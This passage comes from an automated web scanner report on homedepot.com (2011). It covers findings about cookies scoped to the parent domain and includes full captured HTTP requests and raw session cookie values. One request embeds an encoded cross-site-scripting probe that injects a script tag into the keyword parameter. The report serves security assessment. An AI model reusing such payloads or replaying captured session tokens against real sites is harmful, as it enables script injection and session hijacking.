Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223868476%3a%3bC25%5fEXP%3d1360063868%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:31:08 GMT;Path=/
THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:31:08 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?Ns=P_REP_PRC_MODE%7C1&storeId=10051&catalogId=10053&langId=-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85e5b7-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223792094%3a%3bC25%5fEXP%3d1360063792%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=4; s_pers=%20s_campaign%3Dno%2520value%7C1308225658356%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225658360%3B%20p_30%3DSubcategory%7C1308225658363%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

10.8. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223758601%3a%3bC25%5fEXP%3d1360063758%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:29:18 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fTopseller%5fSort%7c1%5f%7eC26%5fEXP%7e; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223600410%3a%3bC25%5fEXP%3d1360063600%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1308225421778%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Ewalk%2520behind%2520mowers%7C1308225421780%3B%20p_30%3DSubcategory%7C1308225421782%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; FSRCookie=ForeseeLoyalty=1

Response

10.9. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230145967%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cOvVzEI6Oajqj7Z9XG6ty%2bZOWJoA%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226545942%3a%3bC25%5fEXP%3d1360066545%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:15:45 GMT;Path=/
WC_PERSISTENT=QolLt0HmGKtgnMXrHDVRUVhne1g%3d%0a%3b2011%2d06%2d16+08%3a15%3a45%2e967%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:19:13 GMT;Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253E&omni=3&selectedCatgry=SEARCH+ALL HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85ca6f-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d; s_pers=%20s_scOpen%3D1%7C1308225942967%3B%20s_campaign%3Dno%2520value%7C1308225943059%3B%20s_prevPage%3Dproductdetails%7C1308225943066%3B%20p_30%3DPIP%7C1308225943073%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=6; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 223220
Expires: Thu, 16 Jun 2011 12:15:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:15:46 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226545942%3a%3bC25%5fEXP%3d1360066545%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:15:45 GMT;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=QolLt0HmGKtgnMXrHDVRUVhne1g%3d%0a%3b2011%2d06%2d16+08%3a15%3a45%2e967%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:19:13 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230145967%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cOvVzEI6Oajqj7Z9XG6ty%2bZOWJoA%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://ww
...[SNIP]...

10.10. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Bopis2OverLay

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227634455%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cUvZV8SbnxtrKAy1Jq5PlIZvD2PQ%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224034071%3a%3bC25%5fEXP%3d1360064034%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:54 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Bopis2OverLay?langId=-1&storeId=10051&catalogId=10053&R=202562705&langId=-1&catalogId=10053&storeSkuNum=420816&Overlay_Type=add_to_cart&locStoreNum=2583&pageNum=0&mode=localstore&quantity=1&basePage=PLP HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224031349%3a%3bC25%5fEXP%3d1360064031%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000

Response

10.11. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Navigation

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d;Domain=.homedepot.com;Path=/
